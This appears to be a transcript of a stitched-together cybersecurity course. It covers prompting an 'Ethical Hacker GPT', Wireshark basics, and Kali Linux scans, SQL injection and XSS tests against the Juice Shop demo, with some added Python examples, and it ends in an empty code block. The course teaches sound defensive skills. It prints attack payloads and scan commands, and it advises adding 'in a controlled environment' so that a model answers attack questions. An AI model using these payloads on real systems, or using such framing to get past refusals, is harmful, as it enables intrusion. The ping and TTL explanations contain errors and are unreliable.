the conversation starters, as you just saw with the HackerGPT, Ethical Hacker GPT, and the capabilities you want to be enabled, you can do that. And here in the Create section you could write the prompts here, and it will take that information and use it for more purposes, and here you could attach more files that could help create your GPT. Okay guys, so here you could see the configuration and the preview of your GPT, and you can finalize that. So moving back, we'll get back to Ethical Hacker GPT and start with our conversation with him.

So, starting with the first thing we can do is we can ask him: how can I perform a basic security assessment on a web application? So, if I tell you guys, performing a basic security assessment on a web application is crucial for identifying vulnerabilities and ensuring the application is secure, and this process involves using various tools and techniques to test the application for common security issues. So you could ask him "how can I perform a basic security assessment on a web application", just wait for a few seconds, and you could have the response from Ethical Hacker GPT. So you could see that performing a basic security assessment on a web application involves several key steps, and these are the key steps: number one is preparation and information gathering, and how you can do that, these are the steps, identify the scope, gather information; then the second step, that is reconnaissance, and you can use the tools Burp Suite, Nikto and others; similarly you could see all the steps here. So I won't be guiding, or I won't be reading, what responses are generated by Ethical Hacker GPT. I have used that, and he provides very accurate, like I would say around 95 to 96% accurate, results here. I want to show you guys how you can utilize it, so I will show you prompts and what things you can ask him. So this was about the general security thing; now we'll move to ethical hacking, and we can ask him how we can perform a SQL injection attack ethically on a test environment. So these are the prompts that you can write; that would be "how do I perform a SQL injection attack", and that too ethically (if you write this that would be good), "on a test environment". And if I tell you guys, SQL injection is one of the most common web application vulnerabilities, and understanding how to perform a SQL injection attack ethically on a test environment can help you identify and mitigate this risk in your own applications. And you could see he has responded and he has provided you the steps: you can set up a controlled test environment, the first thing, then preparation, and you could use these tools; then you have the manual SQL injection testing, so these are the methods that you could use, that is OR 1=1 for the database, and automated SQL injection testing, so this is the command for that; and you could verify vulnerability, documentation, reporting. So you could see that this GPT is capable of answering the basic questions, as we have discussed the basic questions till now.

Now we'll move to scripting and automation, so here you could see how he responds to this. So we'll ask him, "can you provide a Python script to scan open ports on a network?" So let's see what he provides: provide a Python script, and that too to scan ports on a network. So scanning open ports on a network is a fundamental step in identifying potential vulnerabilities, and a Python script can automate this process, making it easier to regularly check for open ports and secure them. So this is the Python script; you can use any IDE and run it on that, and you could see that he's explaining the code also. Yeah, you can ask him like "can you explain the code line by line" and this HackerGPT will do that for you, and how to run the script, that also he has provided you. And similarly we can also ask him how we can write a bash script to monitor and log unauthorized login attempts, and if you want I can also run this prompt: "how do I write a bash script", and that too to monitor and log unauthorized login attempts. So we can monitor and log unauthorized login attempts, and that would be essential for maintaining the security of your system. So as you can see, he has written a bash script, and that can help you automate this process, and this will provide real-time alerts and logs for further analysis, and you could see that he's providing the explanation and how you can run the script, and he's writing the note also, like you can write more prompts if you have any doubts in any of the scripts
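The "monitor and log unauthorized login attempts" task asked for above, done in Python rather than bash so the logic can be tested: parse sshd failures from a syslog-style auth.log and flag source IPs that exceed a failure threshold within a sliding time window. This is an added example, not HackerGPT's output or the course's code; the log lines are constructed.

```python
"""Flag brute-force style SSH login failures from auth.log lines.

Added example, not from the course. Handles both "invalid user" failures
and failures for existing accounts, and ignores successful logins.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed /var/log/auth.log excerpt (syslog format, no year), not a real log.
SAMPLE_AUTH_LOG = """\
Jun 12 10:01:05 kali sshd[2211]: Failed password for invalid user admin from 203.0.113.45 port 51022 ssh2
Jun 12 10:01:09 kali sshd[2211]: Failed password for invalid user admin from 203.0.113.45 port 51022 ssh2
Jun 12 10:01:14 kali sshd[2215]: Failed password for root from 203.0.113.45 port 51030 ssh2
Jun 12 10:01:20 kali sshd[2219]: Failed password for root from 203.0.113.45 port 51034 ssh2
Jun 12 10:02:00 kali sshd[2230]: Accepted password for kali from 192.168.72.1 port 40212 ssh2
Jun 12 10:05:41 kali sshd[2240]: Failed password for kali from 192.168.72.1 port 40300 ssh2
Jun 12 10:40:02 kali sshd[2299]: Failed password for root from 203.0.113.45 port 51100 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_failed_logins(text, year=2024):
    """Return [(timestamp, source_ip, username)] for every failed sshd login.

    Syslog lines carry no year, so the caller supplies it (assumed 2024 here).
    """
    events = []
    for line in text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["ip"], m["user"]))
    return events


def flag_brute_force(events, threshold=3, window_seconds=60):
    """Return {ip: (first, last, count)} for the first window in which an IP
    reaches `threshold` failures within `window_seconds` (sliding window)."""
    by_ip = defaultdict(list)
    for ts, ip, _user in events:
        by_ip[ip].append(ts)
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1                       # slide the window forward
            if end - start + 1 >= threshold:
                flagged[ip] = (times[start], times[end], end - start + 1)
                break
    return flagged


def alert_lines(flagged):
    """Render findings as log lines, ready to append to a monitoring log."""
    return [
        f"ALERT ssh-bruteforce src={ip} failures={count} "
        f"first={first:%Y-%m-%dT%H:%M:%S} last={last:%Y-%m-%dT%H:%M:%S}"
        for ip, (first, last, count) in sorted(flagged.items())
    ]


if __name__ == "__main__":
    events = parse_failed_logins(SAMPLE_AUTH_LOG)
    for line in alert_lines(flag_brute_force(events)):
        print(line)
```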
script or any of the responses that hacker GPT has responded and he will definitely provide you with good responses so now moving on now we’ll ask this ethical hacker GPD about some specific security tools and we could ask him about Burp suit and so let’s write a prompt can you explain how to configure and use Burp suit or we can write for web application testing so if I sum you up so Burp suit is a powerful tool for web application security testing and understanding how to configure and use it effectively can help you identify and address a wide range of security vulnerabilities in your applications so you could see he has provided the initial steps that would be downloading and installing Burpsuit configuring your browser to use Burpsuit as a proxy and then intercept and inspect traffic and then you can use it for testing purpose logging and reporting and tips for effective testing so this is the response for the security tools and if we talk about incident response we can ask him to write a script to collect system logs for forensic analysis so collecting system logs is a critical part of incident response and forensic analysis and this script can automate processes that can ensure that you have all the necessary data to investigate security incidents effectively so if I write here we can ask this hacker GPD and I’m sure he will provide the response for that and write the script so can you provide a script to collect system logs for forensic analysis so as I told you this is the critical part of incident response and we have covered about the tools that is BBS suit we have asked him about the automation process general cyber security question ethical hacking that would be SQL injection attack and the Python script to scan open ports on a network so he can write scripts also automation task and he could response with the general cyber security questions also and if you see here for the incident response he has writed the script to collect system logs for forensic 
analysis. So I won't be explaining this code, as we're just looking for the prompts that we can give to Ethical Hacker GPT; if you want, you could also ask it to explain this code line by line. Here it has also given the explanation: the directories and files to collect, and after that it's collecting the logs, which will be copied into the directory it has mentioned in a variable, that is the output directory; archiving logs, cleanup, and how to run the script. So this was about incident response.

Now we move to some advanced topics, and in advanced topics what we can ask is how to perform a man-in-the-middle attack in a controlled environment. Remember that you have to mention some keywords, such as "in a controlled environment"; only then will it provide the response to you. So I will start here: "How do I perform a man-in-the-middle attack in a controlled environment?" If you understand how a man-in-the-middle attack works in a controlled environment, this can help you develop better defenses against such attacks, and it's important to learn and practice these techniques ethically. You can see here that it's providing the prerequisites and the step-by-step guide to how you can conduct a man-in-the-middle attack: first, set up the controlled environment, then install the necessary tools, enable IP forwarding, perform ARP spoofing, and then capture and analyze traffic, clean up and restore the network, and the conclusion. So you could just follow up with more prompts, like "I want more information about setting up the controlled environment"; just write this prompt and Ethical Hacker GPT will provide more responses to you, so it will provide how you can set up the controlled environment.

So now, moving on, we will ask some more prompts, and that could be about reverse engineering. We could ask it, "Can you explain the process of reverse engineering a malware sample?", or we can also ask about honeypots to
detect malicious activity, that could be "How can I implement a honeypot to detect malicious activity?", or "What are the techniques for securing a Docker container?" So we'll ask it one prompt here; let's see what it responds to that: "How can I implement a honeypot to detect malicious activity?" You can see that it has started responding to that, and if I give you the summary: a honeypot is a security mechanism set up to detect, deflect or in some manner counteract attempts at unauthorized use of information systems. Implementing a honeypot can help you monitor and understand attack patterns, and this is the step-by-step guide to implement a honeypot: you can choose the type of honeypot, prepare your environment, install and configure the honeypot software (and these are all the commands for how you can configure it), then you can monitor and analyze the honeypot, and regular maintenance and updates. And this is the simple honeypot using Honey; you could install that and run these commands.

So with that, guys, in the last part we will also cover cyber security policies and compliance. It could also answer those prompts, so you can ask it what should be included in a company's cyber security policy, and you could mention which type of company you are running. So I will ask it: "What should be included in an IT company's cyber security policy?" Let's see. You can see here that creating a comprehensive security policy for an IT company involves addressing various aspects, and that would be: introduction, first the purpose of the cyber security policy; scope; roles and responsibilities; data protection and privacy; network security; application security; user security awareness and training; incident response and management; compliance and legal requirements; physical security; device and endpoint security. Similarly, you could ask it, "Draft me the company's cyber security policy and start with the introduction," so it will
provide you all the introduction points, and then you can ask it, "Draft roles and responsibilities," and it will draft that also. So you could break it into parts and ask Ethical Hacker GPT, and it will respond to you; as it has some limitations on the number of words in some of the responses, you could ask it in parts and it will respond to you.

Do you know, friends, that Wireshark is a powerful network protocol analyzer that helps you capture and analyze network traffic in real time? It allows you to deep dive into data packets traveling through your network, giving you insights into network performance, security and troubleshooting. In this tutorial we'll guide you through the basics of using Wireshark, from setting up your capture environment to interpreting the data. By the end of this tutorial you'll have a solid understanding of how to navigate the Wireshark interface, set up filters and analyze network traffic for different use cases. So guys, let's get started.

So guys, let us start first by understanding what Wireshark is. Wireshark is a comprehensive open-source network protocol analyzer that basically allows users to capture and analyze the data traveling over the network in real time. It is widely used by network administrators, security professionals and also developers for various purposes. For example, guys, network troubleshooting, where you have to identify and resolve network issues by examining traffic patterns and diagnosing connectivity problems. The next one is network analysis, which we'll also be doing in our hands-on, where you have to understand and optimize network performance by analyzing data flows and interactions between network systems. The third one is security auditing: you will also have to detect and investigate unusual or potentially malicious network activities such as unauthorized access or data breaches. And finally you have protocol development, where you can debug and develop network protocols by capturing and analyzing
protocol messages and behaviors.

The key features of Wireshark are: the first one is packet capture. Wireshark captures packets of data transmitted over the network; each packet contains a wealth of information, including source and destination addresses, and also you get protocol types and payload data. So, as you can see over here, I've already downloaded Wireshark (and I'll guide you also on how to download it), but as you can see, these are the lines that show the Wi-Fi packet graph; it is showing how the packets are being transmitted, so this is basically the real-time analysis you can get through Wireshark. The next one is detailed inspection: guys, Wireshark also decodes and displays data at various protocol layers, for example Ethernet, IP, TCP, HTTP, which allows for detailed examination of network communications. You can also perform filtering and searching. Then you'll also get a chance to do data visualization, which includes features for visualizing network graphics such as flow graphs, as you can see over here, and also statistics, which can help in understanding network behavior and performance. Wireshark is available for multiple operating systems, like Windows, macOS, Linux and many more.

Now there are certain scenarios where network security engineers use it: suppose network performance monitoring, where you track and analyze the performance of network applications and services; you also have incident response, where you investigate and respond to network security incidents by analyzing captured traffic; and you also do protocol analysis, where you examine and troubleshoot network protocols and ensure proper implementation.

Now let us start with Wireshark. So first let us download Wireshark, and before we download it I expect that you would have got a brief idea regarding what Wireshark is. Now what you have to do, guys, is go to this link, wireshark.org/download.html. Since I'm using Windows, I have clicked on
Windows x64 Installer; just click on this, and as you can see it will start downloading. So guys, since I've already downloaded it I may not have to do it again, and the steps are very simple: you just have to click yes, yes, and it's going to download all the required dependencies and your installer will be ready, and after clicking all the OKs you are going to get something like this. So this is your entry into the Wireshark network analyzer. Now, as you can see over here, you can capture the network packets from these interfaces; you can see Local Area Connection 10, the Adapter for loopback traffic capture, Bluetooth is there, then you have the Ethernets. So let us choose Wi-Fi as the network interface and just click on this. As you can see over here, so many packets have started running up, and this is the shark icon; basically it is doing the real-time packet capturing, where you have all these things.

So now let us try to understand what is there in Wireshark. You can see you have File, basically for managing files: you have Open, Save, Export; these kinds of options are there. You can also export the TLS session keys, you can export the objects, and you can do Print and Quit. Then here in Edit you can modify the preferences, settings and profiles. If you talk about View, you can adjust the layout of Wireshark over here. If you talk about Go, you can navigate through the packets over here. Then here is Capture: you can start or stop over here, and you can restart it. Next is Analyze, so as you can see over here you have Display Filters, Display Filter Macros, Display Filter Expressions and many more. Similarly you have Statistics, which helps in viewing network statistics and data summaries. Here you have Telephony for using those kinds of protocols, then you have Wireless, then you have Tools over here (Firewall ACL Rules, MAC Address), and there you have the Help icon. So this is a very basic
overview of this application.

Now let us do some basic exercises first. So let us try to capture traffic first; since I've already selected our network interface as Wi-Fi, let us restart it: you can just go to Capture and click Restart. So this has started. Now go to your browser and just type, say, httpbin.org. So guys, this is a basic website that we have requested in our browser. Let us go to our Wireshark and stop this for a moment. As you can see over here, this icon shows applying a display filter; now go over here and type the filter, say http, and you can see our filtering is done. As you can see, here you have the source, you have the destination, here you have the time, here you have the number, here you have the length of the packets, and this is the info.

So now let us do the general analysis of the Wireshark output. As you can see over here, the first one is HTTP requests and responses. This is our source; we are sending a request to the destination address 44.219.81.240, the protocol is HTTP and the length of the packet is 480, and it is basically a GET request, so GET HTTP/1.1. Now there's a reply from this destination over here to our source; the protocol is still HTTP, now the length of the packet has increased to 887, and what we are getting over here is that the status is 200 and it says OK. Now, as you can see, what we are getting is basically an HTML file over here. Similarly we are again requesting and we are getting a JSON file over here, a GET for a specific JSON, HTTP/1.1, and similarly the reply is coming. So as you can see it's a to-and-fro motion where we are requesting a destination, which is the browser, with the protocol HTTP, and similarly we are getting a reply from our destination. So guys, this is our device and this is the given resource we are trying to access in our browser, so
basically now we can see these are the content types, which is text/html for the HTML structure, and also you can see over here this is a JSON type; these are the types of content we are trying to access, and this is the request we have made to our destination, which is the browser, to httpbin.org, and it is returning a text/html file. I hope, guys, you would have got a brief idea of how you can do the general analysis of the Wireshark output.

Now let us try to do one more example, which will make our concepts clearer. Guys, I will show you one more use case of this: that you can diagnose network issues with the ping and tracert commands. With the help of Wireshark this can also be done, guys. So what you need next is to open a terminal (just right-click over here), and now in this what we are going to do, guys, is generate ICMP traffic with the help of the ping command. So now we type ping google.com, and you can see over here the requests and replies have started. Now what we will do, guys, is use the tracert command for tracing our packet flow; you can see we have got something over here, and we will discuss this a bit later. Now let us open our Wireshark, and what we'll do, guys, is type icmp: go to the filter and type icmp and just click over here, but before that you have to stop the capture. Now let us try, and you can see over here that here the destination is showing unreachable, but here we are getting the reply. Now let us try to examine this protocol. Let us first try to understand what we did in the terminal. So guys, when we type the command ping google.com, this command is basically testing the reachability of google.com by sending Internet Control Message Protocol, or ICMP, echo request packets and waiting for the replies, which are echo
responses. Now guys, let us break down the ping results. In the first three replies we are going to see that each reply shows the IP address 142.250.193.110, which is one of the Google servers, and you can see the round-trip time (latency) for the packets: for the first one it is showing around 76 milliseconds, for the second the round-trip time is showing around 88, the third is 99 and the fourth one is 30 milliseconds. Now you can see there is something called time to live also, and in this case the time to live for each packet is around 55 milliseconds; basically this field indicates how many hops or routers the packet can pass through before being discarded. Now you can also see the request timeout: the fourth packet is a request timeout, meaning no reply was received within the set time. And you can also see the ping statistics: you can see here sent four packets, received four packets, and there is no loss. So this is one thing, and also the approximate round-trip time in milliseconds: you can see the minimum is 30 milliseconds and the maximum is 99 milliseconds, and the average is calculated as 73 milliseconds. So these are the statistics we got.

Now you can see over here we have the tracert command. Here no arguments are provided first, so let us try to understand: -d means do not resolve IP addresses to host names, -h means the maximum number of hops or routers to search, and -w means the timeout in milliseconds for each reply. So suppose I run tracert google.com: guys, this will show all the hops that the packet has to travel through to reach the Google server, which will help to diagnose where delays or issues might occur on the path. Now you can see over here there are a lot of options given, so similarly you can read this.

Now let us try to do the Wireshark analysis. You can see over here our source, 10.101.5.118, and we are sending the request to the Google server, and this is Internet Control Message Protocol; you can see over here this is echo, this is a ping
request with ID 0x001, and we can see the sequence is also given, the time to live, and the reply is in 7641. So this packet is basically what we are doing, guys: 7630 is our packet number and this is what we are sending as a request, then 7641 is the reply from the Google server with the given ID, the sequence number and the time to live, and it is also giving the request one. Now what you can do, guys, is also apply one filter over here; with the help of this you can see there are a lot of options for filtering, so you can read the documentation for this, and whenever it turns red, guys, it is showing something as an error. Now let us do this and let us type our IP address, say 10.101.5.118; this is also one of the ways you can apply the filter, so it's going to filter on the IP address. Let's do this: it is going to filter on our IP address, which is basically the same one that is sending, because we have not given any other ping requests. So guys, here is what we can see; this is the kind of analysis we are doing, basically. So guys, this was Wireshark analysis for diagnosing network issues with the help of the ping and tracert commands, and you can do a lot of other things with the help of Wireshark. Basically these tools are used by network administrators, hackers and also network engineers to understand network performance and diagnose network issues. So this was a short exercise which I have shown you about the basics of Wireshark; I hope you would have enjoyed today's video.

Imagine being able to assess the security of systems like a pro hacker, but ethically, of course. In this tutorial we are going to walk you through how to perform penetration testing using Kali Linux, which is one of the most powerful tools in the cyber security world. Whether you are a beginner or a tech enthusiast, you're going to learn the basics of pentesting with essential
tools in Kali Linux and how to identify vulnerabilities in your network. By the end of this video you're going to have a strong foundation on how to start your ethical hacking journey.

So first let us try to understand what exactly penetration testing is. Penetration testing, or pen testing, is a simulated cyber attack which is conducted by ethical hackers to evaluate the security of a system, application or even a network. The goal here is to uncover vulnerabilities and weak points that attackers could exploit and provide actionable recommendations to secure the systems. Unlike regular vulnerability assessments, penetration testing goes a step further by actively exploiting the vulnerabilities to understand their impact.

Now you would be wondering why we do penetration testing. Penetration testing serves several critical purposes. First of all, identifying the weaknesses; so you could just write that over here, and now let us discuss this point. Even the most secure systems have vulnerabilities, and these can stem from outdated software, misconfiguration or even human error. Penetration testing uncovers these weaknesses before they are exploited. Suppose I give you an example: you have a web application that uses an outdated version of PHP; a penetration test could reveal that this version has a known vulnerability allowing remote code execution. So for this purpose you could use penetration testing. The second point is testing incident response: a penetration test doesn't just highlight vulnerabilities, but it also assesses how your systems and team respond to simulated attacks. This helps organizations identify gaps in their incident response plans. Suppose during a test an ethical hacker deploys ransomware; the security team's speed and efficiency in detecting and containing the attack determine their readiness for a real incident. So for incident response testing you could use penetration testing. Now the third point could be meeting the compliance
standards: industries like healthcare, finance and e-commerce must comply with stringent data protection regulations, so penetration testing helps meet standards such as PCI DSS, GDPR or HIPAA. So I'll just mention all of them over here, fine. Now the fourth reason which I could think of could be protecting the reputation: a breach can damage customers' trust and tarnish your brand image, and penetration testing is a proactive way to safeguard your reputation. For example, a major retail chain suffers a data breach exposing millions of customer records; post-incident analysis reveals that a simple penetration test could have identified the vulnerability and prevented the breach.

Now let us discuss the types of penetration testing. Penetration tests can be categorized based on their scope and the level of information shared with the tester, and on that basis I have mentioned three penetration testing types. The first one is black-box testing: here the tester has no prior knowledge of the system, which simulates an attack by an external hacker; so that is called black-box testing. Now if I discuss white-box testing, here the tester has full access to the system, including source code, architecture details, etc., so this simulates an insider attack or a highly informed hacker. The third one that we have over here is gray-box testing: here the tester has partial knowledge, such as user credentials or limited architecture details, and based on this he simulates the attack. So you could do these kinds of penetration testing on a system to check its vulnerability.

Now let's do a hands-on exercise on penetration testing with Kali Linux. If you have not installed Kali Linux, just go to the official documentation or official website of Kali Linux; here you could see you'll get a tab called Get Kali. You could go for the virtual machine way of installation, or you could go through installing the image; there are various ways you could do it, but if you're using the Windows
operating system, what you could do is just go directly to your Microsoft Edge; here it is going to have Kali Linux, just type it in, and you could see this app is there and you could install this directly. You could see I have installed it directly, so let us open the terminal; the process of installation is very, very simple. Now on Kali Linux you have to install some additional tools to perform penetration testing, so now let us try to set up the tools. You can see over here I have opened my Kali Linux terminal. The tools that we are going to install over here will be Nmap, whois, dig, Nikto, WPScan, OpenVAS and Metasploit. Let me give you a brief idea about these tools.

Nmap also stands for Network Mapper, so the purpose of this tool is going to be scanning the network to identify open ports, services and operating systems; you could also scan the target for open ports and the running services. The next tool will be whois: whois is going to provide you domain registration details and ownership information, for example whois followed by a name like example.com, which could be a demo website; this will help you gather domain-level information about the target. Now the third tool is dig, so dig performs DNS enumeration to retrieve the DNS records, for example A, MX, NS; all of these are DNS records, basically, so this tool is very important, as we will be needing some DNS records to do the penetration testing. Basically it is used to explore the DNS structure of the targeted domain. Now the fourth tool is going to be Nikto: Nikto is going to scan web servers for vulnerabilities such as outdated software, default configurations and potential misconfigurations; it is also going to check for vulnerabilities on the web server. The fifth tool is WPScan: if I talk about this, it basically scans WordPress websites for vulnerabilities in themes, plugins
and core files; it enumerates the users and checks for plugin vulnerabilities. WPScan requires an API token, which can be obtained from this website, so type wpvulndb.com; you could get it all from here, so this is a certain additional requirement. Now let us talk about the next tool we have, which is OpenVAS. If I talk about OpenVAS, or Greenbone Vulnerability Manager, this provides a comprehensive vulnerability management system; basically it performs scans to detect vulnerabilities across the target. Finally we have Metasploit: if I talk about Metasploit, it is basically used for exploit development and execution for identified vulnerabilities.

Now before installing, you have to type a certain thing like this: sudo apt update. After you have done this, you could just type sudo apt install nmap. Since I've already installed Nmap I don't need to do it, but you could do it with this command. So now let us check the version of Nmap; for that purpose you could type nmap --version, and you could see I have version 7.94. And this is the official documentation of Nmap; if you want more information about this tool you could refer to this documentation. The next tool is whois; the same thing, we have to do sudo apt update, and the next thing would be sudo apt install whois. So we have installed whois also. The next tool will be dig, so just install dig like this: sudo apt install dnsutils. So we have installed dig also, and to check the version type dig -v; you would get the version as 9.2. Finally let us install Nikto with the same command, sudo apt install nikto; since I've already installed Nikto I don't need to do it. Now let us check its version with nikto, and you could see I have the version of Nikto over here. Now the fifth tool will be WPScan; the same thing, so you could see it has installed WPScan also. Now after installing, register at WPScan and copy the
generated API token. So guys, as you can see over here on your WPScan profile you're going to get an API token. Now guys, let's move ahead. You can check the version of WPScan by typing wpscan --version, and you could see I have version 3.8.27 installed. Now let us install OpenVAS; for installing OpenVAS type sudo apt install and then type openvas. You can see over here that our installation is in progress and it is installing this tool, and you can see over here we have installed this tool. Guys, the next step is installing Metasploit, so type sudo apt install metasploit-framework. Since I've already installed this I need not do it, but you can type this command and you could download it. There is one error in this; now it's fine. Now let us check the version of it, so type msfconsole --version, and you can see I have version 6.4.34. Now we have installed all these tools and checked the versions also.

Now let us proceed to penetration testing. So guys, we'll be using this demo website to do the penetration testing; you could get the link over here, it is juice-shop.herokuapp.com, and I will mention the link so you could access this website to learn how to do penetration testing. But one word of advice before you are doing penetration testing of any other application: just get written permission for it; without their permission you cannot do penetration testing of any official website, because the idea is hacking ethically, so unethical practices are not permissible.

Now let us open our Kali Linux. Here we are going to open Nmap, and we are going to run a scan on this website, the same website which we have opened, which is https://juice-shop.herokuapp.com; just copy the link and type nmap -sS -A and give the name of the given website. You could see now it has started scanning; basically this is going to reveal the open ports, services and possibly the underlying technology of the web application. Guys, it might take some time, so just wait for a few moments. You could see over here that Nmap has given the complete scan, so you could see the stats over here: port 80, and it is using the TCP protocol, and the state is open, so port 80 is basically open over here and the service is HTTP, and the version is Cowboy. So we have got a brief idea that the open port for HTTP is 80. Now let us identify the web server used over here: you could see over here the server is Heroku router, so we have got all the information on this website; we have got the open port, so the overall idea was to look for the open port. Now let us do the vulnerability assessment of this, so for doing
the vulnerability assessment we'll be using Nikto, so type nikto -h and the name (copy the link). In this we are going to look for misconfigurations, outdated server versions or exposed directories and files. You could see we have got the target hostname and the target port, and you could see the SSL info is also given over here, and you could see over here it is telling us that the site uses TLS and the Strict-Transport-Security header is not defined. In a similar way it is still looking for vulnerabilities, so let us give it some time. Guys, you could see over here that Nikto has given a lot of vulnerability assessment, so let us try to look at it first. You could see it has also told us that the server is using a wildcard certificate; if you want a brief idea about it just click on this link. Then you could also see over here that it is giving all the information about what could be vulnerable, so now it is giving "backup certificate file found". If you move down a little bit, you could also see that the X-Content-Type-Options header is also not set; here it is telling us that this could allow a user agent to render the content of the site in a different fashion, so a MIME type attack can be done on this website. Guys, you can see over here that it has also given robots.txt. This is actually a plain text file which is located in the root directory of the website, for example juice-shop.herokuapp.com/robots.txt; the primary purpose is to instruct web crawlers, such as search engine bots, which are interacting with the website. It can reveal sensitive information, making it significant from both a web security and an SEO perspective. So guys, you could see over here we could manually check for the robots.txt file: give the link of the given website for which you're doing the pen testing and add /robots.txt. Now you could see in the output it's given User-agent: * and Disallow: /ftp. Now what is User-agent? This is a
directive which applies to all the web crawlers and bots, and the asterisk is a wildcard meaning it is intended for every bot that visits this website, for example Googlebot or Bingbot, etc. Now what is it disallowing? Disallow with this directory is telling bots not to crawl the index of the FTP directory of the website, so bots should skip this FTP directory and avoid listing its content in the search engine. However, this does not restrict manual access by users or attackers, who can directly visit the /ftp URL in their browser or use a tool like curl. So what is the significance of this configuration? For example, with the web crawlers, search engines and bots will respect this directive and avoid crawling the /ftp directory; it is helping optimize crawling by excluding unnecessary or sensitive paths. From the security perspective, the presence of /ftp in robots.txt can be a security risk because it is revealing the existence of a potentially sensitive directory; attackers may manually navigate to /ftp to check for files or vulnerabilities. Third, if we talk about it with respect to penetration testing, the FTP entry can serve as a clue for ethical hackers or penetration testers to investigate, so you can check the /ftp directory for sensitive files like backups, configurations or credentials. Now if you want to look for hidden files, you could use tools like dirb; you could go for directory enumeration for the same, just type dirb, give the link and /ftp, so you might be able to access some hidden directories under /ftp. So I hope you would have got a brief idea regarding /ftp; do check for these files in a given website, it's a very, very important process of penetration testing.

Now let us finally proceed to SQL injection. So guys, SQL injection is a technique which is used to manipulate a website's database by injecting malicious SQL code into the input fields,
The steps involved are as follows. First, go to the login page (you can see Account here; click on Login). Now enter the following credentials: for the username you could give, say, 1, and for the password you could give anything or leave it blank. You can see here that we have injected a payload like 1=1, and you can see that I am not able to log in, so this looks secured. Now let us give some other email and a password, or leave it blank; it still asks for a password, so type anything and log in. You can see it says invalid email or password, which means we have not registered here; that is why it says invalid email.

Let me explain what I am trying to do here. The payload I am trying to inject, as I have written, is something like 1=1, and this breaks the SQL query logic. For example, if the application builds a query like SELECT * FROM users WHERE username = '<input>' AND password = '<input>' and the username is ' OR 1=1 --, the OR condition always evaluates to true. So, as you can see, I am writing a SQL query something like this: SELECT * FROM users WHERE username = 'anything' OR 1=1 -- and the password can be anything. This is a kind of SQL injection where we put something malicious inside the query: the OR 1=1 condition always evaluates to true, so it bypasses the authentication, and the -- is used to comment out the rest of the SQL query, ignoring the password check. If you successfully log in without valid credentials, you can say the application is vulnerable to SQL injection. But you can see here that this is not happening, and even if you leave out the password it does not log you in, so this application is not vulnerable to SQL injection.

Now let us try cross-site scripting. Cross-site scripting, or XSS, is an attack that injects malicious scripts into a website, which are then executed in the browsers of unsuspecting users. The steps to test for XSS: first identify the input fields, such as the search bar or a feedback form on this website, and enter a payload. So let us go to the search bar, right-click and click Inspect, and find where the script is written (press Ctrl+F to search). Now let us perform the XSS test. We have navigated to our web application and targeted this input field, and we are trying to inject <script>alert("XSS")</script>. Right-click on the field, go to the developer tools, and add the script to the element; if an alert box pops up, it shows that the field is vulnerable to XSS. As you can see, I have inserted <script>alert("XSS")</script> and I am trying to inject it; if a pop-up appears here, it indicates that this input field is vulnerable to XSS. In this way you can perform the exploitation.

If you cannot manually insert the tag, you can modify the existing DOM: locate the input field in the developer tools, right-click on the input element, manually replace its value, press Enter to save the changes, and check whether the script executes. Let us right-click on this: you can see nothing is happening, so it is all fine. That is one way to do it. Alternatively, go to the console and set the form field's value programmatically, for example document.querySelectorAll('input')[0].value = '<script>alert("XSS")</script>', and then, if applicable, trigger the search button programmatically with document.querySelector('form').submit(). If the pop-up appears, we have successfully injected the XSS payload. If you still cannot inject the script, which also happens, first inspect the sanitization logic: review how the application processes your input, since some apps escape dangerous characters like the angle brackets around script. Then test alternative input fields: try other forms or query parameters where your script might work.

So that was a small introduction to penetration testing using the various tools present in Kali Linux. Cyber security is not just a job; it is a war zone where organizations fight daily to protect their most valuable assets, data and systems. The stakes have never been higher and the demand for skilled professionals is rapidly growing: a trusted survey predicts millions of cyber security job openings in India alone by next year. But here is the harsh reality: most candidates lack the skills the industry demands. This is where certifications come in. You have probably heard people ask, why do certifications, why not just get a degree? Let me tell you the truth: college programs often fail to keep up with the fast-changing demands of the cyber security industry. Certifications, on the other hand, are laser-focused on the skills you actually need; they are faster, more affordable and targeted, whether you are a fresher or a professional looking to climb up the ladder.
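The authentication bypass described in the SQL injection walkthrough above, as an added example that is not part of the video: a login query built by string concatenation beside its parameterized fix, run against an in-memory SQLite table constructed here. The table layout, the account and the function names are assumptions made for this illustration.

```python
"""Added example (not from the video): the login bypass explained above,
reproduced against an in-memory SQLite database so the vulnerable query can be
compared with a parameterized one. The users table and its single account are
constructed for this example."""
import hashlib
import sqlite3


def _hash(password: str) -> str:
    # Plain SHA-256 keeps the example short; real systems use a salted,
    # deliberately slow password hash (argon2, scrypt, bcrypt).
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Create a throwaway database with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)",
                 ("alice", _hash("correct horse")))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Builds the SQL by string concatenation, the pattern the walkthrough
    describes: the username becomes part of the SQL text, so ' OR 1=1 --
    turns the WHERE clause into 'always true' and the -- comments out the
    password check."""
    query = ("SELECT * FROM users WHERE username = '" + username +
             "' AND password_hash = '" + _hash(password) + "'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Same query with bound parameters: the driver sends the username as a
    value, never as SQL, so the payload is just a username that does not exist."""
    row = conn.execute(
        "SELECT * FROM users WHERE username = ? AND password_hash = ?",
        (username, _hash(password)),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1 --"   # the payload discussed on this page
    print("vulnerable login with payload:", login_vulnerable(db, payload, "x"))  # True
    print("parameterized login with payload:", login_safe(db, payload, "x"))     # False
```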
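For the XSS part above, an added example (not from the video) that shows the reflected search field rendered with raw interpolation and with output encoding, which is the "escape dangerous characters" behaviour the walkthrough mentions. The page template and the helper names are constructed for this illustration.

```python
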